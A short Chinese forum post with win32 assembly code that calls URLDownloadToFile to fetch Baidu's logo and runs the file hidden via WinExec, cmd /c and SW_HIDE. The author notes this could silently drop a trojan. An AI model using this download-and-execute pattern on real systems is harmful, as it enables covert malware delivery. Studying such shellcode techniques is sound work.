;最近看shellcode相关的东西,里面很多地方调用了urlDownloadtofile 函数 它是urlmon 导出的一个函数
;自己也写了个win32asm来调用一下这个函数,去下载biadu的logo文件,然后用winExec函数去执行.大部分都
;api的应用没什么技巧.不过里面有一个小知识点就是 cmd /c 只有有了这个参数cmd才能顺利执行情况程序,
;这东西要是镶嵌到Exe中而且下载的是个小木马,winExec 的最右边参数是SW_HIDE还是能有点邪恶啊~
;api我就不多解释了 查查还是很容易的~
.386
.model flat,stdcall
option casemap:none

include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
include URLMON.inc
includelib URLMON.LIB

.data
preserve  db 'd:\logo.gif',0
resource  db 'http://www.baidu.com/img/logo.gif',0
szText    db '下载成功',0
szCaption db '下载',0

cmd   db 'c:\windows\system32\cmd.exe /c d:\logo.gif',0
.code

start:
invoke URLDownloadToFile,NULL,offset resource,offset preserve,0,NULL
.if eax ==  S_OK
invoke MessageBox,NULL,offset szText,offset szCaption,MB_OK
.endif

push SW_HIDE
push offset cmd
call WinExec

invoke ExitProcess,NULL
end start

[招生]科锐逆向工程师培训(2025年3月11日实地，远程教学同时开班, 第52期)！